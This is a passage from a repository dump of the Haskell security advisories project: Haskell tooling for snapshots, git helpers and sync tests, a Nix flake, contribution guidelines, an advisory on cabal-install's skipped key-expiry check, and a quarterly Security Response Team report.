repositoryParser = 62 | mkSnapshotSnapshot 63 | <$> strOption 64 | ( long "snapshot-root" 65 | <> short 'd' 66 | <> metavar "SNAPSHOT-ROOT" 67 | <> value (snapshotRoot defaultSnapshot) 68 | ) 69 | <*> (fmap Left repositoryGithubParser <|> fmap Right repositoryUrlParser) 70 | where mkSnapshotSnapshot root params = 71 | case params of 72 | Left (repoUrl, repoBranch) -> 73 | githubSnapshot root repoUrl repoBranch 74 | Right snapshotUrl' -> 75 | Snapshot 76 | { snapshotRoot = root, 77 | snapshotUrl = SnapshotUrl snapshotUrl' 78 | } 79 | 80 | 81 | repositoryGithubParser :: Parser (String, String) 82 | repositoryGithubParser = 83 | (,) 84 | <$> strOption 85 | ( long "repository-url" 86 | <> short 'r' 87 | <> metavar "REPOSITORY-URL" 88 | <> value "https://github.com/haskell/security-advisories" 89 | ) 90 | <*> strOption 91 | ( long "repository-branch" 92 | <> short 'b' 93 | <> metavar "REPOSITORY-BRANCH" 94 | <> value "generated/snapshot-export" 95 | ) 96 | 97 | repositoryUrlParser :: Parser String 98 | repositoryUrlParser = 99 | strOption 100 | ( long "archive-url" 101 | <> short 'u' 102 | <> metavar "ARCHIVE-URL" 103 | ) 104 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Reporting Vulnerabilities 2 | 3 | To add an advisory to the database, open a [Pull Request] against 4 | [this](https://github.com/haskell/security-advisories/pulls) repository containing the new advisory: 5 | 6 | ## Required Steps 7 | 8 | 1. Create a file named `HSEC-0000-0000.md` in the `advisories/hackage/` 9 | subdirectory of the repository (you may need to create it if it doesn't exist) 10 | 2. Copy and paste the [TOML advisory template] from the README.md file in this repo. 11 | Delete the comments and additional whitespace, and fill it out with the 12 | details of the advisory. Surround the TOML data with \```toml and \``` markers. 13 | 3. 
Write a human-readable Markdown description in the same file, after the \``` marker and a newline. Use [this example advisory][example] as a reference. 14 | 4. Open a [Pull Request]. After being reviewed your advisory will be assigned 15 | a `HSEC-*` advisory identifier and be published to the database. 16 | 17 | ### Optional Steps 18 | 19 | Feel free to do either or both of these as you see fit (we recommend you do both): 20 | 21 | 4. Deprecate the affected versions of the package on Hackage. 22 | 5. Request a CVE for your vulnerability. See for details: 23 | and . 24 | Alternatively, you can create a GitHub Security Advisory (GHSA) and let them request 25 | a CVE for you. In this case, you can add the GHSA ID to the advisory via the 26 | `aliases` field. 27 | 28 | ### License 29 | 30 | All published security advisories are released under [CC0](https://creativecommons.org/share-your-work/public-domain/cc0/). By contributing an advisory, you agree to release the entire content of the advisory (including machine-readable metadata, example code, and textual descriptions) under CC0. 31 | 32 | ## Criteria 33 | 34 | This is a database of security vulnerabilities. The following are 35 | examples of qualifying vulnerabilities: 36 | 37 | * Code Execution (i.e. RCE) 38 | * Denial of service opportunities 39 | * Memory Corruption 40 | * Privilege Escalation (either at OS level or inside of an app/library) 41 | * File Disclosure / Directory Traversal 42 | * Web Security (e.g. XSS, CSRF) 43 | * Format Injection, e.g. shell escaping, SQL injection (and also XSS) 44 | * Cryptography Failure (e.g. confidentiality breakage, integrity breakage, key leakage) 45 | * Covert Channels (e.g. Spectre, Meltdown) 46 | 47 | ## FAQ 48 | 49 | **Q: Do I need to be the maintainer of a package to file an advisory?** 50 | 51 | A: No, anyone can file an advisory against any package. Reports 52 | will be verified prior to merging. 
If a report 53 | turns out to be incorrect then it will be corrected or removed from the 54 | database. 55 | 56 | **Q: Can I file an advisory without creating a pull request?** 57 | 58 | A: Yes, instead of creating a full advisory yourself you can also 59 | [open an issue on the security-advisories repo](https://github.com/haskell/security-advisories/issues) 60 | or email information about the vulnerability to 61 | 62 | **Q: Does this project have a PGP key or other means of handling embargoed vulnerabilities?** 63 | 64 | A: High-impact vulnerabilities can be reported privately to 65 | [security-advisories@haskell.org](mailto:security-advisories@haskell.org), 66 | but we do not use PGP. Alternatively, Haskell vulnerabilities can 67 | be reported via the CERT/CC [VINCE] system. Use "Haskell 68 | Programming Language" as the vendor name. 69 | 70 | [VINCE]: https://kb.cert.org/vince/ 71 | [Pull Request]: https://github.com/haskell/security-advisories/pulls 72 | [TOML advisory template]: https://github.com/haskell/security-advisories/blob/main/README.md#advisory-format 73 | [example]: https://raw.githubusercontent.com/haskell/security-advisories/main/EXAMPLE_ADVISORY.md 74 | -------------------------------------------------------------------------------- /code/hsec-tools/assets/css/default.css: -------------------------------------------------------------------------------- 1 | :root{ 2 | --bg-color:#FFFFFF; 3 | --text-color:#333; 4 | --outline-color:#DB83ED; 5 | --header-color:#5E5184; 6 | --anchor-color:#9E358F; 7 | --anchor-visited-color:#6F5F9C; 8 | --code-bg-color:#FAFAFA; 9 | --filename-bg:#EAEAEA; 10 | --code-color:#383a42; 11 | --code-bg-color:#fafafa; 12 | --code-comment-color:#a0a1a7; 13 | --code-kw-color:#af005f; 14 | --code-name-color:#e45649; 15 | --code-literal-color:#268bd2; 16 | --code-string-color:#cb4b16; 17 | --code-attr-color:#986801; 18 | --code-constructor-color:#5f5faf; 19 | --code-symbol-color:#4078f2; 20 | --code-record-field-color:#c18401; 21 
| --code-pragma-color:#2aa198 22 | } 23 | @media (prefers-color-scheme:dark){ 24 | :root{ 25 | --bg-color:#333; 26 | --text-color:#C9D1D9; 27 | --header-color:#BBA1FF; 28 | --anchor-color:#EB82DC; 29 | --anchor-visited-color:#D5C5FF; 30 | --code-bg-color:transparent; 31 | --filename-bg:#2C2C2C; 32 | --code-color:#C9D1D9; 33 | --code-bg-color:#333; 34 | --code-comment-color:#a0a1a7; 35 | --code-kw-color:#BBA1FF; 36 | --code-name-color:#e45649; 37 | --code-literal-color:#268bd2; 38 | --code-string-color:#cb4b16; 39 | --code-attr-color:#986801; 40 | --code-constructor-color:#d079c9; 41 | --code-symbol-color:var(--code-color); 42 | --code-record-field-color:#c18401; 43 | --code-pragma-color:#2aa198 44 | } 45 | } 46 | *:focus-visible{ 47 | outline-color:var(--outline-color) 48 | } 49 | body{ 50 | color:var(--text-color); 51 | background-color:var(--bg-color) 52 | } 53 | a{ 54 | color:var(--anchor-color) 55 | } 56 | a:visited{ 57 | color:var(--anchor-visited-color) 58 | } 59 | h1,h2,h3,h4,h5,h6{ 60 | color:var(--header-color) 61 | } 62 | input{ 63 | background-color:rgba(255,255,255,0.06); 64 | color:var(--text-color) 65 | } 66 | .nav-bar{ 67 | text-align: right; 68 | } 69 | .nav-bar ul{ 70 | display: inline-block; 71 | list-style: none; 72 | margin: 0; 73 | padding: 0; 74 | } 75 | .nav-bar li{ 76 | display: inline-block; 77 | vertical-align: middle; 78 | padding: 0; 79 | margin: 0; 80 | height: 100%; 81 | position: relative; 82 | } 83 | *:focus-visible{ 84 | outline-offset:4px; 85 | outline-width:1px 86 | } 87 | body{ 88 | font-size:1.6rem; 89 | margin:0 auto; 90 | max-width:120rem 91 | } 92 | footer{ 93 | margin-top:3rem; 94 | padding:1.2rem 0; 95 | border-top:0.2rem solid #000; 96 | font-size:1.2rem; 97 | color:#555 98 | } 99 | h1{ 100 | font-size:2.4rem 101 | } 102 | h2{ 103 | font-size:2rem 104 | } 105 | html{ 106 | font-size:62.5%; 107 | font-family:Helvetica,sans-serif 108 | } 109 | table tbody td{ 110 | padding:5px 111 | } 112 | footer{ 113 | padding: 0 2%; 114 | 
text-align: center; 115 | } 116 | footer .HF{ 117 | height:50px; 118 | line-height:50px; 119 | display:inline-block; 120 | background-repeat:no-repeat; 121 | background-image:url('../images/hf-logo.png'); 122 | background-size:50px; 123 | background-position:left center; 124 | padding-left:60px 125 | } 126 | @media (max-width:319px){ 127 | .nav-bar{ 128 | margin:0 1.5rem 0 0; 129 | } 130 | .nav-bar a{ 131 | display:block; 132 | line-height:1.6 133 | } 134 | } 135 | @media (min-width:320px){ 136 | .nav-bar{ 137 | margin:0 2rem 0 0; 138 | } 139 | .nav-bar a{ 140 | display:inline; 141 | margin:0 0.6rem 142 | } 143 | } 144 | @media (min-width:640px){ 145 | .nav-bar{ 146 | margin:0 3rem 0 0; 147 | } 148 | .nav-bar a{ 149 | margin:0 0 0 1.2rem; 150 | display:inline 151 | } 152 | } 153 | 154 | #advisory dt { 155 | margin-top: 0.75em; 156 | } 157 | -------------------------------------------------------------------------------- /flake.nix: -------------------------------------------------------------------------------- 1 | { 2 | description = "hsec-tools"; 3 | 4 | inputs = { 5 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; 6 | flake-utils.url = "github:numtide/flake-utils"; 7 | }; 8 | 9 | outputs = { self, nixpkgs, flake-utils }: 10 | flake-utils.lib.eachDefaultSystem (system: 11 | let 12 | overlays = [ ]; 13 | pkgs = 14 | import nixpkgs { inherit system overlays; config.allowBroken = true; }; 15 | jailbreakUnbreak = pkg: 16 | pkgs.haskell.lib.doJailbreak (pkgs.haskell.lib.dontCheck (pkgs.haskell.lib.unmarkBroken pkg)); 17 | 18 | purl = pkgs.haskellPackages.callCabal2nix "purl" ./code/purl { }; 19 | cvss = pkgs.haskellPackages.callCabal2nix "cvss" ./code/cvss { }; 20 | osv = pkgs.haskellPackages.callCabal2nix "osv" ./code/osv { inherit cvss purl; }; 21 | hsec-core = pkgs.haskellPackages.callCabal2nix "hsec-core" ./code/hsec-core { 22 | inherit cvss osv; 23 | }; 24 | hsec-tools = returnShellEnv: 25 | pkgs.haskellPackages.developPackage { 26 | inherit returnShellEnv; 
27 | name = "hsec-tools"; 28 | root = ./code/hsec-tools; 29 | withHoogle = false; 30 | overrides = self: super: { 31 | inherit cvss hsec-core osv; 32 | }; 33 | 34 | modifier = drv: 35 | if returnShellEnv 36 | then 37 | pkgs.haskell.lib.addBuildTools drv 38 | (with pkgs.haskellPackages; 39 | [ 40 | cabal-fmt 41 | cabal-install 42 | ghcid 43 | haskell-language-server 44 | pkgs.nixpkgs-fmt 45 | ]) 46 | else drv; 47 | }; 48 | hsec-sync = 49 | pkgs.haskell.lib.dontCheck 50 | (pkgs.haskellPackages.callCabal2nix 51 | "hsec-sync" 52 | ./code/hsec-sync 53 | { inherit hsec-core; }); 54 | 55 | gitconfig = 56 | pkgs.writeTextFile { 57 | name = ".gitconfig"; 58 | text = '' 59 | [safe] 60 | directory = * 61 | ''; 62 | destination = "/.gitconfig"; # should match 'config.WorkDir' 63 | }; 64 | in 65 | { 66 | packages.cvss = cvss; 67 | packages.osv = osv; 68 | packages.purl = purl; 69 | packages.hsec-core = hsec-core; 70 | packages.hsec-tools = pkgs.haskell.lib.justStaticExecutables (hsec-tools false); 71 | packages.hsec-sync = hsec-sync; 72 | packages.hsec-tools-image = 73 | pkgs.dockerTools.buildImage { 74 | name = "haskell/hsec-tools"; 75 | tag = "latest"; 76 | 77 | copyToRoot = pkgs.buildEnv { 78 | name = "image-root"; 79 | paths = [ 80 | self.packages.${system}.hsec-tools 81 | pkgs.gitMinimal.out 82 | gitconfig 83 | ]; 84 | pathsToLink = [ "/bin" "/" ]; 85 | }; 86 | runAsRoot = "rm -Rf /share"; 87 | config = { 88 | Cmd = [ "/bin/hsec-tools" ]; 89 | Env = [ 90 | "LOCALE_ARCHIVE=${pkgs.glibcLocalesUtf8}/lib/locale/locale-archive" 91 | "LC_TIME=en_US.UTF-8" 92 | "LANG=en_US.UTF-8" 93 | "LANGUAGE=en" 94 | "LC_ALL=en_US.UTF-8" 95 | "GIT_DISCOVERY_ACROSS_FILESYSTEM=1" 96 | ]; 97 | Volumes = { 98 | "/repo" = { }; 99 | }; 100 | WorkDir = "/"; 101 | }; 102 | }; 103 | # Used by `nix build` & `nix run` (prod exe) 104 | defaultPackage = self.packages.${system}.hsec-tools; 105 | 106 | # Used by `nix develop` (dev shell) 107 | devShell = hsec-tools true; 108 | }); 109 | } 110 | 
-------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Generate/Snapshot.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE DeriveAnyClass #-} 2 | {-# LANGUAGE DeriveGeneric #-} 3 | {-# LANGUAGE DerivingStrategies #-} 4 | {-# LANGUAGE LambdaCase #-} 5 | {-# LANGUAGE OverloadedStrings #-} 6 | 7 | module Security.Advisories.Generate.Snapshot 8 | ( createSnapshot, 9 | ) 10 | where 11 | 12 | import Control.Monad (forM_) 13 | import Data.Aeson (ToJSON, encodeFile) 14 | import Data.Default (def) 15 | import qualified Data.Text.IO as T 16 | import Data.Time (UTCTime) 17 | import Data.Version (Version) 18 | import GHC.Generics (Generic) 19 | import Paths_hsec_tools (version) 20 | import qualified Prettyprinter as Pretty 21 | import qualified Prettyprinter.Render.Text as Pretty 22 | import Security.Advisories.Core.Advisory 23 | import Security.Advisories.Filesystem (advisoryFromFile, forAdvisory, forReserved) 24 | import Security.Advisories.Format (fromAdvisory) 25 | import System.Directory (copyFileWithMetadata, createDirectoryIfMissing) 26 | import System.FilePath (takeDirectory, (), takeFileName) 27 | import System.IO (hPrint, hPutStrLn, stderr) 28 | import Text.Pandoc (Block (CodeBlock), Pandoc (Pandoc), nullMeta, runIOorExplode) 29 | import Text.Pandoc.Writers (writeCommonMark) 30 | import qualified Toml 31 | import Validation (Validation (..)) 32 | import qualified Data.Text as T 33 | 34 | -- * Actions 35 | 36 | createSnapshot :: FilePath -> FilePath -> IO () 37 | createSnapshot src dst = do 38 | let toDstFilePath orig = dst drop (length src + 1) orig 39 | 40 | forReserved src $ \p _ -> do 41 | createDirectoryIfMissing True $ takeDirectory $ toDstFilePath p 42 | hPutStrLn stderr $ "Copying '" <> p <> "' to '" <> toDstFilePath p <> "'" 43 | copyFileWithMetadata p $ toDstFilePath p 44 | 45 | advisoriesLatestUpdates <- 46 | forAdvisory src $ \p _ -> do 47 
| hPutStrLn stderr $ "Taking a snapshot of '" <> p <> "'" 48 | advisoryFromFile p 49 | >>= \case 50 | Failure e -> do 51 | hPrint stderr e 52 | return [] 53 | Success advisory -> do 54 | let pandoc = 55 | Pandoc 56 | nullMeta 57 | ( CodeBlock 58 | ("", ["toml"], []) 59 | ( Pretty.renderStrict $ 60 | Pretty.layoutPretty Pretty.defaultLayoutOptions $ 61 | Toml.encode $ 62 | fromAdvisory advisory 63 | ) 64 | : blocks (advisoryPandoc advisory) 65 | ) 66 | blocks (Pandoc _ xs) = xs 67 | rendered <- runIOorExplode $ writeCommonMark def pandoc 68 | 69 | let targetFiles = 70 | concat 71 | [ [toDstFilePath p], 72 | legacyComponentFile . affectedComponentIdentifier <$> advisoryAffected advisory 73 | ] 74 | advisoryFilename = takeFileName p 75 | legacyComponentFile = 76 | \case 77 | Repository _ repoName pkg -> dst T.unpack (unRepositoryName repoName) unPackageName pkg advisoryFilename 78 | GHC comp -> dst "ghc" T.unpack (ghcComponentToText comp) advisoryFilename 79 | forM_ targetFiles $ \targetFile -> do 80 | hPutStrLn stderr $ " * Writing it to '" <> targetFile <> "'" 81 | createDirectoryIfMissing True $ takeDirectory targetFile 82 | T.writeFile targetFile rendered 83 | 84 | return [advisoryModified advisory] 85 | 86 | let metadataPath = dst "snapshot.json" 87 | metadata = 88 | SnapshotMetadata 89 | { latestUpdate = maximum advisoriesLatestUpdates, 90 | snapshotVersion = version 91 | } 92 | hPutStrLn stderr $ "Writing snapshot metadata to '" <> metadataPath <> "'" 93 | encodeFile metadataPath metadata 94 | 95 | data SnapshotMetadata = SnapshotMetadata 96 | { latestUpdate :: UTCTime, 97 | snapshotVersion :: Version 98 | } 99 | deriving stock (Generic) 100 | deriving anyclass (ToJSON) 101 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Git.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE LambdaCase #-} 2 | {-# LANGUAGE DerivingStrategies #-} 3 | 4 | 
{-| 5 | 6 | Helpers for deriving advisory metadata from a Git repo. 7 | 8 | -} 9 | module Security.Advisories.Git 10 | ( AdvisoryGitInfo(..) 11 | , GitError(..) 12 | , explainGitError 13 | , getAdvisoryGitInfo 14 | , getRepoRoot 15 | , add 16 | , commit 17 | ) 18 | where 19 | 20 | import Data.Char (isSpace) 21 | import Data.List (dropWhileEnd) 22 | import qualified Data.List.NonEmpty as NE 23 | import Data.Time (UTCTime, zonedTimeToUTC) 24 | import Data.Time.Format.ISO8601 (iso8601ParseM) 25 | import System.Exit (ExitCode(ExitSuccess)) 26 | import System.FilePath (splitFileName) 27 | import System.Process (readProcessWithExitCode) 28 | import Control.Applicative ((<|>)) 29 | 30 | data AdvisoryGitInfo = AdvisoryGitInfo 31 | { firstAppearanceCommitDate :: UTCTime 32 | , lastModificationCommitDate :: UTCTime 33 | } 34 | 35 | data GitError 36 | = GitProcessError ExitCode String String -- ^ exit code, stdout and stderr 37 | | GitTimeParseError String -- ^ unable to parse this input as a datetime 38 | deriving stock (Eq, Ord, Show) 39 | 40 | explainGitError :: GitError -> String 41 | explainGitError = \case 42 | GitProcessError status stdout stderr -> 43 | unlines 44 | [ "git exited with status " <> show status 45 | , ">>> standard output:" 46 | , stdout 47 | , ">>> standard error:" 48 | , stderr 49 | ] 50 | GitTimeParseError s -> 51 | "failed to parse time: " <> s 52 | 53 | -- | Get top-level directory of the working tree. 54 | -- 55 | getRepoRoot :: FilePath -> IO (Either GitError FilePath) 56 | getRepoRoot path = do 57 | (status, stdout, stderr) <- readProcessWithExitCode 58 | "git" 59 | [ "-C", path 60 | , "rev-parse" 61 | , "--show-toplevel" 62 | ] 63 | "" -- standard input 64 | pure $ case status of 65 | ExitSuccess -> Right $ trim stdout 66 | _ -> Left $ GitProcessError status stdout stderr 67 | where 68 | trim = dropWhileEnd isSpace . 
    dropWhile isSpace

-- | Add changes to index
--
add
  :: FilePath -- ^ path to working tree
  -> [FilePath] -- ^ files to update in index
  -> IO (Either GitError ())
add path pathspecs = do
  (status, stdout, stderr) <- readProcessWithExitCode
    "git"
    ( ["-C", path, "add"] <> pathspecs )
    "" -- standard input
  pure $ case status of
    ExitSuccess -> Right ()
    _ -> Left $ GitProcessError status stdout stderr

-- | Commit changes to repo.
--
commit
  :: FilePath -- ^ path to working tree
  -> String -- ^ commit message
  -> IO (Either GitError ())
commit path msg = do
  (status, stdout, stderr) <- readProcessWithExitCode
    "git"
    ["-C", path, "commit", "-m", msg]
    "" -- standard input
  pure $ case status of
    ExitSuccess -> Right ()
    _ -> Left $ GitProcessError status stdout stderr

getAdvisoryGitInfo :: FilePath -> IO (Either GitError AdvisoryGitInfo)
getAdvisoryGitInfo path = do
  let (dir, file) = splitFileName path
  (status, stdout, stderr) <- readProcessWithExitCode
    "git"
    [ "-C", dir
    , "log"
    , "--pretty=format:%cI" -- print committer date
    , "--find-renames"
    , file
    ]
    "" -- standard input
  let timestamps = filter (not . null) $ lines stdout
  case status of
    ExitSuccess | Just timestamps' <- NE.nonEmpty timestamps ->
      pure $ AdvisoryGitInfo
        <$> parseTime (NE.last timestamps') -- first commit is last line
        <*> parseTime (NE.head timestamps') -- most recent commit is first line
    _ ->
      -- `null lines` should not happen, but if it does we treat it
      -- the same as `ExitFailure`
      pure . Left $ GitProcessError status stdout stderr
  where
    parseTime :: String -> Either GitError UTCTime
    parseTime s = maybe (Left $ GitTimeParseError s) Right $
      iso8601ParseM s
      <|> zonedTimeToUTC <$> iso8601ParseM s
--------------------------------------------------------------------------------
/code/hsec-sync/test/Spec/SyncSpec.hs:
--------------------------------------------------------------------------------
{-# LANGUAGE OverloadedStrings #-}

module Spec.SyncSpec (spec) where

import Control.Monad (unless)
import Data.Bifunctor (first)
import Security.Advisories.Sync
import qualified System.Directory as D
import System.Environment (lookupEnv)
import System.FilePath ((</>))
import System.IO.Temp (withSystemTempDirectory)
import Test.Tasty
import Test.Tasty.HUnit

spec :: TestTree
spec = testGroup "Sync" []

_spec :: TestTree
_spec =
  testGroup
    "Sync"
    [ testGroup
        "sync"
        [ testCase "Invalid root should fail" $ do
            let snapshot = snapshotAt "/dev/advisories"
            status snapshot >>= (@?= DirectoryMissing)
            isGitHubActionRunner <- lookupEnv "GITHUB_ACTIONS"
            unless (isGitHubActionRunner == Just "true") $ do
              -- GitHub Action runners let you write anywhere
              result <- sync snapshot
              first (const ("" :: String)) result @?= Left ""
              status snapshot >>= (@?= DirectoryMissing),
          testCase "Subdirectory creation should work" $
            withSystemTempDirectory "hsec-sync" $ \p -> do
              let snapshot = snapshotAt $ p </> "snapshot"
              status snapshot >>= (@?= DirectoryMissing)
              result <- sync snapshot
              result @?= Right Created
              status snapshot >>= (@?= DirectoryUpToDate),
          testCase "With existing subdirectory creation should work" $
            withSystemTempDirectory "hsec-sync" $ \p -> do
              D.createDirectory $ p </> "snapshot"
              let snapshot = snapshotAt $ p </> "snapshot"
              result <- sync snapshot
              result @?= Right Created,
          testCase "Sync twice should be a no-op" $
            withSystemTempDirectory "hsec-sync" $ \p -> do
              let snapshot = snapshotAt p
              status snapshot >>= (@?= DirectoryIncoherent)
              resultCreate <- sync snapshot
              resultCreate @?= Right Created
              resultResync <- sync snapshot
              resultResync @?= Right AlreadyUpToDate,
          testCase "Sync behind should update" $
            withSystemTempDirectory "hsec-sync" $ \p -> do
              let snapshot = snapshotAt p
              resultCreate <- sync snapshot
              resultCreate @?= Right Created
              writeFile
                (p </> "snapshot.json")
                "{\"latestUpdate\":\"2020-03-11T12:26:51Z\",\"snapshotVersion\":\"0.1.0.0\"}"
              status snapshot >>= (@?= DirectoryOutDated)
              resultResync <- sync snapshot
              resultResync @?= Right Updated
              status snapshot >>= (@?= DirectoryUpToDate),
          testCase "Sync a broken snapshot.json" $
            withSystemTempDirectory "hsec-sync" $ \p -> do
              let snapshot = snapshotAt p
              resultCreate <- sync snapshot
              resultCreate @?= Right Created
              writeFile
                (p </> "snapshot.json")
                "{\"latestpdate\":\"2020-03-11T12:26:51Z\",\"snapshotVersion\":\"0.1.0.0\"}"
              status snapshot >>= (@?= DirectoryIncoherent)
              resultResync <- sync snapshot
              resultResync @?= Right Updated
              status snapshot >>= (@?= DirectoryUpToDate),
          testCase "Sync a deleted snapshot.json" $
            withSystemTempDirectory "hsec-sync" $ \p -> do
              let snapshot = snapshotAt p
              resultCreate <- sync snapshot
              resultCreate @?= Right Created
              D.removeFile (p </> "snapshot.json")
              status snapshot >>= (@?= DirectoryOutDated)
              resultResync <- sync snapshot
              resultResync @?= Right Updated
              status snapshot >>= (@?= DirectoryIncoherent)
        ]
    ]

snapshotAt :: FilePath -> Snapshot
snapshotAt root =
  defaultSnapshot {snapshotRoot = root}
--------------------------------------------------------------------------------
/advisories/published/2023/HSEC-2023-0015.md:
--------------------------------------------------------------------------------
```toml
[advisory]
id = "HSEC-2023-0015"
cwe = [672]
keywords = ["hackage", "mitm", "supply-chain"]

[[affected]]
package = "cabal-install"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"
[[affected.versions]]
introduced = "1.24.0.0"
fixed = "3.10.2.0"

[[references]]
type = "REPORT"
url = "https://github.com/haskell/cabal/issues/8918#issuecomment-1521096581"
[[references]]
type = "FIX"
url = "https://github.com/haskell/cabal/commit/dcfdc9cffd74cade4e8cf3df37c5993413ffd30f"
```

# cabal-install uses expired key policies

A problem was recently discovered in `cabal-install`'s
implementation of the Hackage Security protocol that would allow an
attacker who was in possession of a revoked private key and who
could perform a man-in-the-middle attack against Hackage to use the
revoked key to deliver malicious packages. At this time, this is
only a theoretical attack - no keys have been revoked. Release
3.10.2.0 of `cabal-install` contains a fix for this bug, and we have
contacted distributors of older versions (such as Linux
distributions) with a patch that they can apply.

## Background

Hackage Security is an implementation of [The Update Framework][],
which is a design for a package repository that allows untrusted
mirrors without undermining software supply-chain security. In
particular, Hackage Security cryptographically guarantees the
following properties:

* Mirrors of Hackage cannot change the contents of packages. This
  prevents the insertion of malicious code.

* Mirrors cannot omit newer packages for more than a few days
  without clients noticing. This ensures both that mirrors cannot
  maliciously deny security updates, and that mistakes in their
  configuration will be noticed.

Hackage has a [key policy file][] that delegates authority to a
number of private keys for various purposes. Most of the keys are
kept securely offline by trusted community members who annually
re-sign the various files to indicate that they still have
confidence in Hackage's policies. However, to prevent clients from
being denied updates, Hackage has an automated process that
periodically re-signs a timestamp file. This signature has a short
expiry. Additionally, a snapshot file, updated on each package
upload, contains signed hashes of the Hackage index. The timestamp
and snapshot private keys are held in memory on the Hackage server.
These are called the operational keys. If an operational key is ever
compromised, then it will be revoked by having the Hackage root
keyholders sign a new key policy file. To prevent replay attacks,
clients that connect to Hackage after this update will reject older
policy files, based on a monotonically increasing file version
number.

If a client has not yet received the updated policy file (for
example, because they have a fresh install of `cabal-install` or
because they have not run `cabal update` in some time), the built-in
expiration date in the file limits the window of exposure in which
the revoked operational keys would still be accepted. As long as the
root keys have not been compromised, the compromised operational
keys can only be used until the policy file expires. In addition to
compromising a Hackage operational key, an attacker would
additionally need to either compromise a Hackage mirror or perform a
man-in-the-middle attack against the target in order to serve a
malicious or obsolete package index.
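The two client-side checks described above, the monotonically increasing version number against replay and the built-in expiry that bounds exposure to a revoked operational key, worked through as an added example; this is constructed code, not from cabal-install or hackage-security, and it assumes a simplified TUF-style root file layout, placeholder key ids, and that signature verification has already passed. The `verify_expiry=False` path reproduces the skipped expiry check that this advisory is about.

```python
import json
from datetime import datetime, timezone
from enum import Enum


class Verdict(Enum):
    ACCEPT = "accept"
    REJECT_REPLAY = "version not newer than the trusted version"
    REJECT_EXPIRED = "policy file has expired"


def check_root_metadata(raw, trusted_version, now, verify_expiry=True):
    """Decide whether a fetched key policy (root) file may replace the one
    the client currently trusts. Signature checks are assumed done already.

    Returns (verdict, operational key ids the file delegates to).
    verify_expiry=False reproduces the flaw in HSEC-2023-0015: the expiry
    check is skipped, so a stale file naming since-revoked operational keys
    is still accepted by a client that has not yet fetched the newer one.
    """
    signed = json.loads(raw)["signed"]
    # Replay protection: the version number must strictly increase.
    if signed["version"] <= trusted_version:
        return Verdict.REJECT_REPLAY, []
    # Exposure bound: a policy file past its expiry delegates to nothing.
    expires = datetime.fromisoformat(signed["expires"].replace("Z", "+00:00"))
    if verify_expiry and expires <= now:
        return Verdict.REJECT_EXPIRED, []
    roles = signed["roles"]
    return Verdict.ACCEPT, sorted(roles["timestamp"]["keyids"]
                                  + roles["snapshot"]["keyids"])


# Constructed policy file (simplified TUF layout, placeholder key ids):
# version 2, expired on 2023-01-01, still delegating to the old keys.
STALE_ROOT = json.dumps({"signed": {
    "_type": "root", "version": 2, "expires": "2023-01-01T00:00:00Z",
    "roles": {"timestamp": {"keyids": ["old-timestamp-key"]},
              "snapshot": {"keyids": ["old-snapshot-key"]}}}})
NOW = datetime(2023, 6, 1, tzinfo=timezone.utc)

if __name__ == "__main__":
    # Fresh install (trusts version 1): fixed client rejects, buggy accepts.
    print(check_root_metadata(STALE_ROOT, 1, NOW))
    print(check_root_metadata(STALE_ROOT, 1, NOW, verify_expiry=False))
    # Client already on version 3: an older file is rejected as a replay.
    print(check_root_metadata(STALE_ROOT, 3, NOW))
```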

[key policy file]: https://hackage.haskell.org/root.json
[The Update Framework]: https://theupdateframework.io/

## The Issue

A bug in `cabal-install` caused it to skip the verification of the
key policy file's expiration timestamp. This means that users of
older, unpatched versions of `cabal-install` could be vulnerable to
a malicious mirror or man-in-the-middle attack against Hackage if
they have not connected to Hackage in a long time, even after the
policy file has expired.

We do not believe that it has been possible to exploit this
vulnerability, because no operational keys have been revoked.
However, in case key revocation occurs, we strongly advise all users
of `cabal-install` to ensure that they have version 3.10.2.0 or
newer, which contains the fix.
--------------------------------------------------------------------------------
/reports/2025-04-04-Q1-report.md:
--------------------------------------------------------------------------------
# Haskell Security Response Team - 2025 January–March report

The Haskell Security Response Team (SRT) is a volunteer organization
within the Haskell Foundation that is building tools and processes
to aid the entire Haskell ecosystem in assessing and responding to
security risks. In particular, we maintain a [database][repo] of
security advisories that can serve as a data source for security
tooling.

This report details the SRT activities for January–March 2025.

[repo]: https://github.com/haskell/security-advisories

The SRT is:

- Fraser Tweedale
- Gautier Di Folco
- Lei Zhu
- Mihai Maruseac
- Montez Fitzpatrick
- Tristan de Cacqueray


## How to contact the SRT

For assistance in coordinating a security response to newly
discovered, high impact vulnerabilities, contact
`security-advisories@haskell.org`. Due to limited resources, we can
only coordinate embargoed disclosures for high impact
vulnerabilities affecting current versions of core Haskell tools and
libraries, or in other exceptional cases.

You can submit lower-impact or historical vulnerabilities to the
advisory database via a pull request to our [GitHub
repository][repo].

You can also contact the SRT about non-advisory/security-response
topics. We prefer public communication where possible. In most
cases, [GitHub issues][gh-new-issue] are an appropriate forum. But
the mail address is there if no other appropriate channel exists.

[gh-new-issue]: https://github.com/haskell/security-advisories/issues/new/choose


## Haskell Security Response Team at ZuriHac + Ecosystem Workshop

Gautier will represent the SRT at [ZuriHac] and the [Haskell
Ecosystem Workshop][] (June 5–9). This is a great opportunity to
collaborate on Haskell security tooling, either in person in Zürich
or virtually.

If you have a particular project or collaboration idea, please share
it in the [planning issue (#272)][ticket].

[ZuriHac]: https://zfoh.ch/zurihac2025/
[Haskell Ecosystem Workshop]: https://haskell.foundation/events/2025-haskell-ecosystem-workshop.html
[ticket]: https://github.com/haskell/security-advisories/issues/272


## Conference presentation: *Security response for open source ecosystems*

Fraser presented at [CrikeyCon], a cybersecurity conference in
Brisbane, Australia. The talk *Security response for open source
ecosystems* explains why open source security matters and how to
start and run a security response team, based on his experiences
with the Haskell SRT.

The [slide deck] is available now. Video of the presentation should
appear on the CrikeyCon [YouTube channel] at some point.

[CrikeyCon]: https://crikeycon.com/
[slide deck]: https://speakerdeck.com/frasertweedale/security-response-for-open-source-ecosystems
[YouTube channel]: https://www.youtube.com/@CrikeyCon


## Advisory database

3 contemporary advisories were published during the reporting period.

2 historical advisories were added during the reporting period.

2 HSEC IDs (HSEC-2024-0004 and HSEC-2024-0005) **remain** reserved
